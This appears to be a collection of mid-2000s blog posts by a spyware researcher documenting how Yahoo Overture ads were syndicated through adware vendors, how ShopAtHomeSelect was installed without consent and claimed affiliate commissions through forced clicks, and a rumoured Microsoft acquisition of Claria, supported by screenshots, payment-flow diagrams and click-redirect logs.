Claria’s provision of Yahoo Overture sponsored links raises clear questions of business benefit for affected advertisers. In the second screenshot at right, the user was already at the Dell.com site. (Indeed, Dell might have just paid several dollars to reach that user, via a pay-per-click ad at Yahoo, Google, or elsewhere.) Claria’s popunder risks drawing the user’s attention away from Dell — but if the user then clicks on the prominent Dell ad in Claria’s Overture listing, Dell has to pay again for the same user who was already at the Dell site. Why pay Yahoo and Claria to get the user back, when it was they who took the user from Dell in the first place?

Claria’s provision of Yahoo Overture sponsored links also presents ethical concerns. Many advertisers dislike Claria’s practices — including its aggressive methods of becoming installed on users’ PCs, its serious effects on privacy, and its harm to computer performance. Indeed, when I previously revealed that, through another channel, Dell was advertising with Claria in mid 2004, Dell staff sought to distance Dell from Claria, commenting “[T]oday we do not do business with anyone like Claria.” But despite Dell’s stated dislike of Claria, Dell does help fund Claria when Dell purchases pay-per-click ads from Yahoo: Payment flows from Dell to Yahoo to Claria, as shown in the diagram at right. Same for thousands of other Yahoo Overture advertisers.

In the future, Claria purports to plan to shut down its popup business. That’s a move I applaud — it’s been a bad business from the start. But at present Claria still serves lots of popups — including Yahoo Overture popunders as frequently as every few minutes. These ads are big money: Claria’s 2003 SEC S1 discloses receiving $31 million from Yahoo in 2003 alone — despite a relationship only in place for 9 months of that year. Annualizing the payment and taking account of the dramatic increase in pay-per-click fees, Yahoo might now be paying Claria $50 million or more per year. (It’s hard to know for sure because Claria hasn’t filed more recent financial disclosures, and Yahoo doesn’t include this level of detail in its financial reports.)

eXact Advertising – Popups and Sidebars of Yahoo Sponsored Links

A Yahoo Overture auto-opening sidebar, delivered by eXact Advertising, targeting Google search results. A Yahoo Overture auto-opening sidebar, delivered by eXact Advertising, targeting Google search results.

  PPC advertisers
money viewers
   Yahoo Overture   
money viewers
eXact Advertising

The money trail – how funds flow from advertisers to Yahoo Overture to eXact Advertising.

Claria claims to always install with consent — however tricky or ill-gotten, per my testing and documentation. But other Yahoo Overture syndicators can’t even make this claim. On dozens of occasions, I have observed and recorded software from eXact Advertising installed through security holes, with no notice or consent. (Some examples: 1, 2.) I’ve also seen eXact installed by tricky popups claiming to be required to view sexually-explicit videos, and by unrequested popups claiming to offer “browser enhancements.” Others have reported eXact bundled by P2P-distributed videos purporting to offer child pornography, and even by instant messenger worms. In short, when a user has software from eXact, the user is unlikely to have granted meaningful informed consent to the installation, and the user may not have granted any consent at all. Reporters tell me that eXact claims to have fixed these problems, but that’s just not true: I’ve received nonconsensual installations of eXact software this very week. Videos on file.

Despite its poor installation practices, eXact receives Overture sponsored links, shows these advertisements to users, and presumably is paid by Yahoo for doing so.

See screenshot at right, showing an eXact auto-opening sidebar that appeared as I ran a search at Google. The sidebar shows Yahoo Overture links, and clicking a link sends users to Overture and on to the advertiser (without passing through any other search intermediary). Notice the Overture reference in the browser status bar as I hold my mouse over a sponsored link.

To typical users, the eXact-delivered Yahoo Overture sidebar appears to be an integrated part of search results — presumably delivered by Google (or whatever other search engine the user had requested). Notice the absence of any distinctive branding, logo, disclosure, or other identification that the sidebar comes from eXact and Overture. To find such a disclosure, a user must scroll to the bottom of the sidebar. Even there, the disclosure is truncated and hard to read. Screenshot.

eXact’s BullsEye service also shows sponsored link listings in freestanding windows. Here too, results are obtained from Yahoo Overture. Screenshot.

Direct Revenue – Popups and Popunders of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder. A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder.

  PPC advertisers (i.e. Dell)  
money viewers
   Yahoo Overture   
money viewers
InfoSpace
money viewers
Direct Revenue

The money trail – how funds flow from advertisers to Yahoo Overture to Direct Revenue.

Direct Revenue installations are at least as poor as eXact. I have numerous videos on file showing DR installed without consent (one such video on my public site). DR also uses various other tricky methods to get installed — like tricky popups, bundles, etc. But DR is perhaps worse than other advertising software in its unusual difficulty of removal (requiring downloading a special uninstaller from DR’s web site). DR is also unusual in its ability to disable and delete other software on a user’s PC.

Despite these troubling practices, DR also shows Yahoo Overture ads. See e.g. the example ad at right. The searchblazer results appeared when I browsed to Dell.com. Notice Direct Revenue’s “Aurora” branding in the upper-left corner and title bar. Although the ad’s body lacks any Direct Revenue branding or logo, the ad was loaded from the search.offeroptimizer.com server, a server under DR’s control. (Offeroptimizer.com is a well-known DR domain.) Furthermore, clicking on a sponsored link within the ad caused traffic that first passed through search.offeroptimizer.com en route to Overture. In short, this ad is not a rogue advertiser buying traffic from Direct Revenue. Rather, these sponsored links were specifically placed by Direct Revenue itself.

When I clicked on the first sponsored link shown at right, traffic flowed as listed below. See also full packet log.

http://xadsj.offeroptimizer.com/c/click.php?c=48685&s=5261&…
http://msxml.infospace.com/_1_B2HUEF099WI63__dirrev.feed.pu1/…
http://www10.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278&LID=230157&…

As indicated in the diagram at right and in the traffic flow above, Yahoo Overture syndicates its ads to InfoSpace, and InfoSpace in turn syndicates these ads to Direct Revenue. This series of relationships makes it particularly hard for Yahoo Overture to know where its advertisers’ ads will appear: Yahoo must count on InfoSpace to assure the quality, ethics, and compliance of InfoSpace’s partners.

This is not the first instance of InfoSpace partners with questionable practices. In June I documented Google ads syndicated to the IBIS Toolbar (also known to become installed without consent). Like Overture ads passing through InfoSpace en route to Direct Revenue, these Google ads were passed from Google InfoSpace to IBIS.

As in the Claria examples above, Direct Revenue syndications of Yahoo Overture ads often ask advertisers to pay for visitors already at their sites. In the example above, Dell was targeted by a list of sponsored links that places Dell in both of the top two positions. If a user clicks on one of these links, Dell pays Yahoo (and ultimately Direct Revenue) for a user who was already at the Dell site. Screenshot.

180solutions – Popups of Yahoo Sponsored Links

A Yahoo Overture popunder, delivered by Direct Revenue, targeting Dell. Shown after activating the popunder. A Yahoo Overture popup delivered by 180solutions.

  PPC advertisers (i.e. Driverloans)  
money viewers
   Yahoo Overture   
money viewers
InfoSpace
money viewers
180solutions

The money trail – how funds flow from advertisers to Yahoo Overture to 180solutions.

When I first posted this piece, I included no mention of 180solutions. My rationale: They’ve been involved in so many widely-publicized spyware scandals — from installing without consent, to installing with euphemisms (but no EULA) at kids sites, to installing at child porn sites — that undisclosed syndication of Yahoo Overture ads seemed like the least of their problems. Perhaps that’s right. But multiple readers asked me whether 180 wasn’t involved also, and why 180 wasn’t included in my write-up. So make no mistake about it: 180 shows Yahoo Overture ads too.

The screenshot at right shows a popup of Yahoo Overture ads delivered by 180solutions. In testing, I click on the ad, and traffic flows to InfoSpace, then to Overture, then to the advertiser. See traffic log below, and full packet log. See also a video of this click, showing the cookies created as a result of the click.

http://searchresults.180searchassistant.com/clicks.php?p==…
http://msxml.infospace.com/_1_YWCU9J03JUL8FV__180sol.feed/…
http://www10.overture.com/d/sr/?xargs=…
http://www.driverloans.com/app/2p1a?x=seoyahoo:value

Other Advertising Software Installed Improperly – Showing Yahoo Sponsored Links

Yahoo Overture ads in an auto-opening sidebar delivered by Sidefind, targeting type-ins to Dell with Dell sponsored links. Yahoo Overture ads in an auto-opening sidebar delivered by Sidefind, showing Dell sponsored links in response to type-in requests for the Dell.com site.

  PPC advertisers (i.e. Dell)  
money viewers
   Yahoo Overture   
money viewers
81.201.104.136
money viewers
trafficengine.net
money viewers
SideFind

The money trail – how funds flow from advertisers to Yahoo Overture to SideFind.

Claria, eXact Advertising, Direct Revenue, and 180solutions are all relatively well-known programs — each installed on millions (or tens of millions) of PCs, and each backed by major investors. But Yahoo also helps to fund vendors who are far less well-known.

Earlier this summer, in the course of documenting Google funding IBIS, I also prepared detailed proof showing how Yahoo ads get syndicated to IBIS too. Video and packet logs on file.

Just this past week, I happened to test a computer infected with a variety of unwanted software (a few disclosed in license agreements; most not). I observed that traffic was sent to Yahoo from both “Slotchbar” (an unrequested toolbar added to my test PC’s browser without my consent) and “SideFind” (an auto-opening browser sidebar, also installed without consent). I have video and packet logs on file, showing these nonconsensual installations as well as their syndication of PPC advertisements from Yahoo Overture. The screenshot at right shows the auto-activating SideFind sidebar, targeting a type-in request for Dell with various sponsored links, largely pointing back to Dell.

These are just a few of the additional examples I have observed and recorded.

In some instances, Yahoo’s dealings with these smaller spyware vendors entail traffic passing through multiple levels of intermediaries. For example, when SideFind sends traffic to Yahoo Overture, the traffic passes through trafficengine.net and then through an unnamed server at IP address 81.201.104.136 (reportedly operated by Copernic/Inktomi) before reaching Overture. See diagram at right, traffic log below, and full packet log.

http://www.sidefind.com/ist/scripts/log_clicks.php?account_id=…
http://feeds.trafficengine.net/click.ashx?key=computers…
http://81.201.104.136/fast-cgi/bsc?context=redir…
http://www6.overture.com/d/sr/?xargs=…
http://landingstrip.dell.com/landingstrip/ls.asp?CID=8278…

In principle, these many levels of intermediation might make it especially hard for Yahoo to know where traffic begins. However, Yahoo ultimately has a direct relationship with some final source who sends the traffic to Yahoo. (In this example, Yahoo has a direct relationship with the operators of the 81.201.104.136 server.) So Yahoo can require that that final source take steps to keep Yahoo’s ads out of spyware. Furthermore, syndicated traffic often includes a HTTP Referer header that gives the name of the originating site. For example, in the Sidefind packet log, Yahoo’s servers receive a HTTP Referer header bearing the domain name sidefind.com, making it easy for Overture to see where traffic began. With its servers specifically receiving the name and URL of the traffic’s source, Yahoo cannot claim not to know where its ads are being shown.

Yahoo’s Failure to Disclose

If Yahoo’s advertisers were fairly advised of Yahoo’s plan to syndicate their ads to spyware programs, Yahoo might claim to be acting solely as their agent; perhaps advertisers want to buy advertising from Claria, eXact, DR, 180, and other such vendors. But in fact Yahoo fails to tell advertisers what will occur — so Yahoo’s syndication of advertisers’ ads cannot be claimed to occur with advertisers’ authorization.

Yahoo’s marketing materials are silent on the risk of spyware syndication, even where Yahoo’s syndication relationships are large and longstanding (i.e. Claria). Within Yahoo’s marketing materials to solicit new advertisers, Yahoo’s “Publisher Network” page mentions various syndicators of Yahoo ads, but Yahoo fails to mention even a single “adware”-type program. Yahoo’s formal Advertiser Terms and Conditions doesn’t mention adware either, and this document discloses advertisement syndication only to say that Yahoo syndicates ads to “various third parties who may be authorized by Overture to make the Sponsored Listings Marketplace Results available as a link from, an add-on service to, or otherwise in connection with Third Party Products.” Yahoo defines these third-party products broadly, as “Web sites, content, applications and/or e-mails.” “Applications” alludes to spyware — but makes no mention of the specific nature of these applications, nor of the likelihood that these applications install by security exploits, trickery, or taking advantage of users’ naivete.

Only at Yahoo’s privacy page does Yahoo make specific mention of any of its advertising software syndicators. Even there, Yahoo mentions only Claria, and Yahoo calls Claria an “ad network” — without mention of its adware, its software download, and its substantial privacy consequences. Furthermore, Yahoo’s privacy page states only that Yahoo has a “relationship” with Claria — but says nothing about the nature or scope of that relationship, i.e. that Claria shows Yahoo Overture ads. In any event, advertisers are unlikely to look to a page about consumer privacy in order to learn where their ads will be shown.

Given the perceived importance and value of Yahoo’s pay-per-click advertising network, some advertisers might choose to advertise with Yahoo despite the blemish of Yahoo’s dealings with spyware companies. Others might decide not to advertiser with Yahoo at all, if advertising with Yahoo necessarily entails supporting spyware. But where Yahoo fails to disclose these relationships, advertisers are denied this choice.

What Yahoo Should Do

In my view, Yahoo — and other PPC networks facing similar problems — should begin by developing and distributing clear rules for who may syndicate their ads. Last year a Yahoo spokesperson told eWeek that “Overture screens its distribution partners to make sure they gain user permission before downloading software.” “Permission” may sound clear-cut, but in practice it’s a surprisingly imprecise concept. What about “permission” obtained under false pretenses — like promising to fix a user’s clock or to improve security, but actually adding advertising software? What about “permission” obtained from a user at a kids site? What about syndicators that buy traffic from advertising software installed without consent, but that don’t make such software of their own? PPC networks need rules that speak to these situations — presumably forbidding all these methods of trickery and deception.

After clarifying their stance on spyware syndicating their ads, PPC networks need to redouble their efforts at enforcement. Tellingly, even Yahoo’s “permission” standard is violated by the frequent nonconsensual installations of Direct Revenue and eXact Advertising (links above). Nonconsensual installations of these programs are well known to those who test and study spyware, and they’re frequently reported at spyware news sites like Spyware Warrior. PPC network staff need to become familiar with these basic industry sources and testing methods, and they need to enforce their rules accordingly.

At present, Yahoo has many PPC syndicators — apparently hundreds or thousands. (Yahoo does not disclose all its syndicators.) Finding all rogue syndicators may prove hard, especially if Yahoo’s syndicators have further partners of their own (as in the Direct Revenue / InfoSpace and SideFind examples, above). In this article, I’ve focused on a few large and well-known syndicators who rely on software installed on millions of PCs, but smaller players are often harder to find and identify. Nonetheless, I’ve found dozens of rogue PPC syndicators using only a single off-the-shelf PC in my lab. (See above.) With all their resources, big PPC networks (like Yahoo) can surely do far better.

Enforcement also needs to include real penalties for those who break the rules. Merely ejecting a rogue syndicator does not deter future violations: Others see that they can make money from PPC syndication through spyware, anticipating only a slap on the wrist when these practices are discovered. A better enforcement strategy would seek to recapture fees previously paid to rogue syndicators — then refund advertisers for ads shown improperly. If a PPC network adopted this strategy and sued its rogue syndicators where necessary, other rogues would be less anxious to follow.

Beyond advertiser backlash and consumer demand, PPC networks face regulatory pressure to avoid supporting spyware through PPC syndication. For example, in the course of their investigation of Intermix, staff of the New York Attorney General revealed that Yahoo contributed 10% of Intermix’s revenue. NYAG staff say they’re “not ruling out” litigation against Yahoo for funding Intermix. More recently, rumors indicate a possible NYAG investigation of Direct Revenue. Given Yahoo’s past support for Intermix, I wonder how NYAG will react to seeing Yahoo funding Direct Revenue too.

If a PPC network can’t or won’t eliminate rogue syndicators, it could at least grant advertisers the ability to opt out of particular unwanted syndications. Others have offered this suggestion on various occasions (e.g. Kraft seeking to avoid syndicating its ads to white supremacy groups), as to both Yahoo Overture and Google. Affiliate networks all offer this level of granularity — letting each affiliate merchant decide what affiliates may earn fees for promoting it. But to my knowledge, no major PPC search engine offers this level of advertiser control.

Ultimately, PPC syndication offers savvy PPC networks a valuable opportunity — a chance to lead industry efforts to stop the spread of unwanted advertising software. Earlier this week, Azoogle launched its new “MPORT” network with the promise of keeping the network entirely adware-free. With a bit of effort and a renewed commitment to stopping spyware, Yahoo could bring MPORT’s no-adware benefit to Overture advertisers too.

Debunking ShopAtHomeSelect updated October 14, 2005

Reading ShopAtHomeSelect‘s marketing materials, their advertising software might seem to present compelling benefits. SAHS promises users rebates on products they’re already purchasing. And SAHS even offers reminder software to make sure forgetful users don’t miss out on the savings. What could be better than timely reminders of free money?

But the SAHS site doesn’t tell the whole story. My testing demonstrates that SAHS software is often installed without users wanting it, requesting it, or even accepting it. (Details.) When users receive an unwanted SAHS installation, SAHS still claims commissions on users’ purchases — but typical users will never see a penny of the proceeds. (Details.) Meanwhile, whether requested by users or not, SAHS’s commission-claiming practices seem to violate stated rules of affiliate networks. (Details.)

Despite these serious problems, SAHS boasts a superstar list of clients — the biggest merchants at all the major affiliate networks, including Dell, Buy.com, Expedia, Gap, and Apple. Why? Affiliate networks have little incentive to investigate SAHS’s practices or assure compliance with stated rules. (Details.) SAHS and affiliate networks profit, but users and merchants are left as victims. (Details.)

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Wrongful Installations – No Consent, and Tricky So-Called “Consent”

ShopAtHomeSelect is widely known to become installed without meaningful consent — or, in many cases, without any consent at all. Most egregious are installations through security exploits, without any notice or consent. I continually test these installations in my lab, and I have repeatedly observed SAHS appearing unrequested — more than half a dozen such installs, occurring on distinct sites on distinct days. I posted one such video in May, and I retain the others on file.

3D Screensaver installs SAHS, although the SAHS license does not disclose inclusion of SAHSSAHS’s improper installations extend to many of SAHS’s bundling partners. I have repeatedly seen (and often recorded) SAHS disclosed midway through lengthy license agreements; users often have to scroll through dozens of pages to learn of SAHS’s inclusion. Even worse, some programs that bundle SAHS nonetheless fail to mention SAHS’s inclusion. See e.g. 3D Flying Icons, which shows a 12-page 2,286-word license that makes no mention of SAHS, yet 3D installs SAHS anyway. (Screenshot at right.)

PacerD installs SAHS, although the PacerD EULA does not disclose inclusion of SAHS.In other instances, ActiveX popups pressure users to accept multiple advertising programs in the guise of “browser enhancements” (or similar). In February 2005, I observed an ActiveX popup that labeled itself “website access” and “click yes to continue,” but immediately installed SAHS if users pressed yes once. More recently, I posted an analysis of the PacerD ActiveX. (Screenshot at left.) PacerD’s ActiveX popup links to a license agreement which discloses installation of eight advertising programs — but doesn’t mention SAHS, though Pacer in fact does install SAHS. So even when careful users take the time to examine Pacer’s 1,951-word license, in hopes of learning what they’re getting, there’s no way to learn that SAHS will be installed, not to mention grant or deny consent.

A porn video distributed by BitTorrent (P2P) installs SAHS. Disclosure occurs only if users scroll down several pages in the video's EULA.  Disclosure consists of only a single sentence, without even a link to more information.I’m not the only observer to notice SAHS installed improperly. Earlier this month, VitalSecurity.org reported SAHS installed via IM spam: Users receive an unsolicited instant message, and clicking the message’s link installs SAHS (among other programs) without any notice or consent. Last month, PC Pitstop (1, 2) and VitalSecurity.org reported SAHS bundled with porn videos distributed by BitTorrent — so a user seeking adult entertainment would unwittingly receive SAHS too. In my testing of these BitTorrent videos, SAHS was listed in a license agreement preceding the videos, but users had to scroll past four pages of other text to learn of SAHS’s inclusion, and even then SAHS’s mention was only a single sentence — without even a link to an external SAHS license agreement, and without any description of the privacy effects of installing SAHS software. (See screenshot at right.) Furthermore, these BitTorrent videos aren’t SAHS’s only tie to porn videos. In January, I analyzed ActiveX popups triggered by porn videos. These popups falsely claimed to be required to view the videos, but in fact they were mere ploys seeking to install SAHS and other advertising software.

In short, a user receiving SAHS cannot reasonably be claimed to have wanted SAHS, nor to have granted informed consent. Perhaps some SAHS users run SAHS willingly and knowingly, but many clearly do not.

In contrast, affiliate networks’ rules set a high burden for installation disclosure and consent. LinkShare’s Shopping Technologies Addendum (PDF) requires that disclosure be “full and prominent,” a standard met neither by SAHS’s nonconsensual installations, nor by its installation when bundled with porn videos. Commission Junction’s Publisher Code of Conduct requires that disclosure be “clearly presented to and accepted by” users, and CJ specifically prohibits software that is “installed invisibly” (as in the nonconsensual installations detailed above).

SAHS may claim that these wrongful installations have stopped. But that’s just not credible. I’ve continued to see (and record) these installations as recently as the past few days.

SAHS may say these wrongful installations are the fault of its distributors. (SAHS offered that argument when PC Pitstop inquired as to SAHS bundling with porn videos.) But affiliate networks’ rules do not forgive wrongful installations merely because the installations were performed by others. To the contrary, affiliate networks set out high consent requirements which apply no matter who installs the software. Furthermore, with so many diverse wrongful installations over such an extended period, it’s clear that something is fundamentally wrong with SAHS’s installation methods; SAHS can’t escape responsibility by vague finger-pointing.

Update (September 9): Staff from SAHS have prepared a document (PDF) purporting to rebut my findings of nonconsensual and dubious installations of SAHS. In each instance, SAHS claims they weren’t really installed in the manner I describe, so they say I am “mistaken” as to my allegations. Let’s look at each of the types of installations I described, and review the evidence:

Tricky popups (PacerD specifically): I previously posted an analysis of PacerD’s installation, including a screenshot of new folders created by PacerD. SAHS correctly notes that there’s no new folder containing SAHS files. But the lack of a new Program Files folder doesn’t mean SAHS wasn’t installed; quite the contrary, SAHS was installed by PacerD. Furthermore, SAHS was installed into the c:Windows directory, where inexperienced users are unlikely to look for it, and where its files tend to become jumbled with other files. To document this installation, I have added two new screenshots to my SAHS write-up, showing newly-created SAHS files placed in my c:Windows directory. I also have on file a video, showing the installation of the PacerD ActiveX followed (without interruption in the video) by the creation of these files. I also have on file a packet log indicating the newly-installed copy of SAHS contacting SAHS servers. So my initial write-up was right and SAHS’s response is wrong: PacerD did indeed install SAHS — and it did so without mentioning SAHS in any EULA or other disclosure.

Large bundles with little or no disclosure (3D Flying Icons specifically): Here again, SAHS makes the same analytical error. My write-up reports lots of new folders (within c:Program Files) reflecting other programs becoming installed. SAHS didn’t add a folder to c:Program Files, so it didn’t come up in my Program Files screenshots. But SAHS absolutely was installed by 3D. In a video I made at the time (now also posted to my public site), I observed a SAHS installer created in c:Temp (1:44), and I saw SAHS program files in c:Windows at 2:43, in each instance bearing distinctive SAHS icons as well as typical SAHS filenames. So there can be no disputing that 3D installs SAHS.

Nonconsensual installations through security holes: The section above links to a particular single security exploit video, one of literally scores I have on file. My automated network log analysis, file-change, and registry-change analysis confirm that SAHS was installed in the course of that security exploit, and Ad-Aware logs say the same, but the video does not specifically show the installation. That’s not particularly surprising — SAHS installs can be silent, and I wasn’t specifically seeking to document SAHS installs when I made that video. But rather than worry about this single example from so many months back, let me take this opportunity to post a recent example, showing a nonconsensual SAHS installation I happened to receive just last month (August 2005). In this video, I view a page at highconvert.com (video at 0:05), receive a series of security exploits (0:20-0:30), browse my file system and diagnostic tools, and then get a popup indicating that SAHS has been installed (1:57) (screenshot). My packet log and change-logs also confirm the SAHS installation.

So where does this leave my claims of improper SAHS installations? Notwithstanding SAHS’s promises of legitimacy, there can be no doubt of SAHS becoming installed without consent. SAHS may not like to admit it, and SAHS produces intense rhetoric to deny it, but users with SAHS aren’t all “opt-in.” To the contrary, some SAHS users have SAHS just because they’re unlucky enough to get it foisted upon them. And contrary to SAHS’s claim that my findings are “incorrect,” I have ample proof of these nonconsensual SAHS installs.

 

Wrongful Operation – Forced Clicks

In addition to regulating installation methods, affiliate networks’ rules limit the ways in which affiliates may claim affiliate commissions. Commission Junction’s Publisher Code of Conduct prohibits claiming commissions on “non-end-user initiated events” — invoking affiliate links without an “affirmative end-user action.” LinkShare’s Shopping Technologies Addendum (PDF) lacks a corresponding prohibition of non-end-user initiated events, but LinkShare’s Affiliate Membership Agreement repeatedly calls for affirmative user actions as a necessary condition to earning commission. For example, LinkShare’s provision 1.1 says commissions are payable only for “users who activate the hyperlink” (emphasis added); the “users … activate” wording specifically contemplates a user taking an affirmative action, not merely a software program automatically opening a link. (Since LinkShare’s special Addendum lacks any provision to the contrary, these Agreement terms still apply.)

There are good reasons for these rules: Affiliate merchants often make substantial payments if an affiliate link is activated and a user makes a purchase. (For example, Dell could easily pay $10+ for a single purchase through a single link.) So software programs aren’t allowed to “click” on affiliate links automatically. Instead, users must actually show some interest in the links — protecting merchants from being asked to pay commissions when an affiliate did nothing to earn a fee.

Although applicable network rules require that clicks on affiliate links be affirmative and that such clicks actually be performed by users (not just by software), SAHS software opens affiliate links and claims commissions without users taking any specific action. See e.g. this SAHS-Dell video, showing a user requesting www.dell.com on a computer with SAHS installed. SAHS immediately redirects the user to its affiliate link to Dell (video at 0:06), and LinkShare affiliate cookies are created (0:08), all without a user affirmatively clicking on any SAHS affiliate link. See also a corresponding SAHS video for Buy.com, showing affiliate link being loaded (0:06) and cookies created (0:10), again without any user interaction.

So SAHS’s operation constitutes an apparent violation of applicable network rules — claiming affiliate commission without the required user click on an affiliate ad, seemingly contrary to network rules.

Affiliate Networks’ Motives

I began this piece with the claim that affiliate networks have allowed SAHS to remain in their networks, notwithstanding the violations set out above. Why?

One possibility is that the affiliate networks simply never noticed the violations. But that’s a suggestion I can’t accept. Consider the many articles above, each reporting wrongful installations. Much of this work received extensive media coverage, including discussions on industry sites of record. Furthermore, most of these findings can be verified easily using any ordinary PC. So affiliate networks can’t credibly claim ignorance of what was occurring.

More persuasive, in my view, is the theory that affiliate networks declined to punish SAHS because SAHS’s actions are profitable for affiliate networks. When an affiliate merchant pays a commission to an affiliate, that merchant must also pay a fee to the intermediary affiliate network. Commission Junction’s public pricing list reports that this fee is 30% — so for every $1 of commission paid to SAHS, CJ earns another $0.30. As a result, affiliate networks have clear financial incentives to retain even rogue affiliates. (Indeed, at the same time that adware has exploded to infect tens of millions of PCs, CJ and LinkShare are reporting unusually strong earnings. [1, 2])

I don’t want to overstate my worry of affiliate networks’ profit motivation. In recent months, affiliate networks have repeatedly kicked out long-time rule-breakers, even where the rule-breakers make money for the networks. (See e.g. LinkShare kicking out 180solutions, and CJ kicking out 180solutions, Direct Revenue and eXact Advertising.) But these actions generally only occur after an extended period of user and analyst outcry. (See e.g. my writing last summer about 180solutions’ effects on affiliate systems.) In contrast, to date, little attention has been focused on SAHS.

Update (October 14): Commission Junction has removed SAHS from its network, thereby ending SAHS’s relationships with all CJ merchants. No word on similar actions by LinkShare or Performics.

Merchants and Users as Victims

As shown in the example video linked above, SAHS claims affiliate commissions even when users specifically request merchants’ sites. Dell and Buy.com get no bona fide benefit from paying 1%-2% to SAHS, as shown in the videos above. SAHS might claim that it pays users rebates as a way to encourage their purchases from participating merchants. But when SAHS arrives on users’ PCs unrequested, and even without users’ acknowledgement or acceptance of its arrival, users are unlikely to be motivated to make purchases from SAHS-participating merchants. So it’s unclear what benefit SAHS can offer merchants under these circumstances.

Notwithstanding the problems with SAHS’s business, affiliate networks encourage merchants to make payments to SAHS by listing SAHS as an affiliate in good standing, inviting SAHS staff to conferences, and occasionally even giving awards to SAHS. Whether through these network actions or based on merchants’ own failure to diligently investigate, merchants bear the brunt of SAHS’s bad actions — paying out commissions SAHS has not properly earned under stated affiliate network rules.

Users also suffer from SAHS. As a result of the ill-gotten payments paid to SAHS by merchants, SAHS receives funds with which it can and does purchase additional installations from its software distribution partners (including the nonconsensual and tricky installations shown above). Payments from Dell (and other targeted merchants) ultimately help to fund the infection of more users — slowing down more users’ PCs, making more users’ PCs unreliable, and pouring fuel onto the spyware problem. To the extent that affected users respond by buying new PCs, Dell perhaps benefits indirectly — but I gather Dell does not aspire to fund such infections.

SAHS may claim that users benefit from its presence, even if its initial installation was improper. After all, SAHS claims affiliate commissions based on users’ purchases, and SAHS stands ready to refund a share of these commissions to the responsible users. But from the perspective of users who received SAHS without meaningful disclosures, SAHS’s offer is of dubious value. Where a program arrives unrequested, users’ fears of identity theft or fraud will (rightly!) discourage them from providing the personal information necessary to receive a payment (name, address, etc.). SAHS may be offering users legitimate actual payments — but when SAHS’s installation was nonconsensual in the first place, users have no easy way to distinguish SAHS’s offer from a phishing attempt or other scam. Without payment details, SAHS will simply retain users’ funds — giving users no benefit for the unrequested intrusion on their PCs, but giving SAHS extra profits.

This is an unfortunate situation — but it’s not hopeless. Dell, Buy.com, and other affected merchants need not continue to help fund this mess. LinkShare and Commission Junction need not continue to pass money to SAHS from unwitting merchants, nor need they continue taking 30% cuts for themselves. Stay tuned.

Update (September 13): News coverage discusses the problem of SAHS retaining commissions for users who never requested SAHS and never even registered for rebates. CJ claims that they have not confirmed “SAHS performing redirects on unregistered users,” but admits that this would be a “major violation.” I have provided CJ with screenshot and video proof, showing SAHS doing exactly that.

Microsoft to Buy Claria? updated July 12, 2005

Today’s New York Times reports Microsoft “in talks” to buy Claria. Leading commentators think it’s a bad idea (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11). I agree.

I first heard this rumor several weeks back, but I laughed it off as too crazy to be taken seriously. What could Claria offer Microsoft? Most obvious is Claria’s large installed base — reportedly some 40-million PCs. But Claria’s installation practices are troubled — tricking users with ads that look like Windows dialog boxes, on kids sites, touting features Claria knows users don’t need (like clock-synchronizers already built into current versions of Windows). And in Claria’s oft-installed bundle with Kazaa, Claria’s long license lacks section headings, making it exceptionally hard for users to figure out what Claria does or to reasonably assess Claria’s terms. (These problems remain, seven months after I first reported them.) Microsoft wouldn’t want installations obtained through such poor practices.

Claria could also offer Microsoft substantial data about users’ surfing habits. A November 2003 eWeek article reported that Claria’s then-12.1 terabyte database was already the seventh largest in the world — bigger than Federal Express, and rivaling Amazon and Kmart. Claria recently told Release 1.0 its database is now 120 terabytes, the fifth-largest commercial Oracle database in the world. All very interesting, and perhaps troubling to those who worry about illicit use of such detailed data. But why would Microsoft invite this unnecessary privacy firestorm?

Claria could offer Microsoft its experience at advertisement targeting. But Claria’s targeting seems surprisingly simple: If a user goes to one car rental site, show an ad for another, whether in a pop-up, a delayed pop-under, or perhaps some subsequent banner ad placed via Claria’s new BehaviorLink program. Microsoft could design a similar system of its own in a matter of months, for far less than the $500 million it would reportedly cost to buy Claria.

Claria does have some interesting patents, a few making surprisingly broad claims as to software and advertisement delivery. But I’m not sure these patents are actually valid. If Microsoft wanted to implement client-side advertisement targeting, the more natural approach would be a design-around that didn’t infringe Claria’s design. Building it themselves avoids taint from Claria’s bad name, bad history, and bad installation practices.

Microsoft’s role as an operating system vendor and anti-spyware developer raises additional worries in buying Claria. Programs like Claria’s damage the Windows experience — bombarding users with annoying pop-ups, not to mention slowing boot time, adding complexity, and risking extra crashes. If Microsoft buys Claria, it would face practical difficulty in continuing to criticize, detect, and remove similar programs from others.

The Times says Microsoft’s Ballmer wants to be “more aggressive” in pursuing Google. But an aggressive strategy need not ignore business ethics — even if Google’s current distributors and partners are less than praiseworthy (1, 2). So I’m surprised that Ballmer reportedly personally approved negotiations with Claria. That said, others within Microsoft apparently oppose the acquisition, and negotiations are reportedly “on the verge” of breaking off. Cooler heads prevail, or so it seems.

It’s worth noting that no one from Microsoft or Claria has officially confirmed the negotiations. Techdirt and SiliconBeat claim this is all just a rumor. I have somewhat more faith in the Times’ reporting procedures; I’d like to think their editors wouldn’t run the story without confirmation from reasonable sources. Alex Eckelberry of Sunbelt offers what seems to me the most natural explanation: Microsoft leaked this story on purpose, as a “trial balloon” to test public response.

Microsoft AntiSpyware now recommends that users "ignore" Claria's presence on their PCs.Update (July 1): A Dozleng.com post reports that Microsoft’s AntiSpyware Beta now recommends that users “ignore” Claria. To confirm this result, I downloaded Claria’s DashBar and Precision Time products, then installed MSAS, all on a fresh virtual PC that hadn’t previously run any of these programs. MSAS’s recommendation and default action was “Ignore.” (See screenshot at right.) In contrast, when last I ran MSAS on a PC with Claria software installed, MSAS recommended removing these same programs. This is exactly the kind of conflict of interest I worried about three paragraphs above — but I didn’t anticipate how quickly this problem would come into effect.

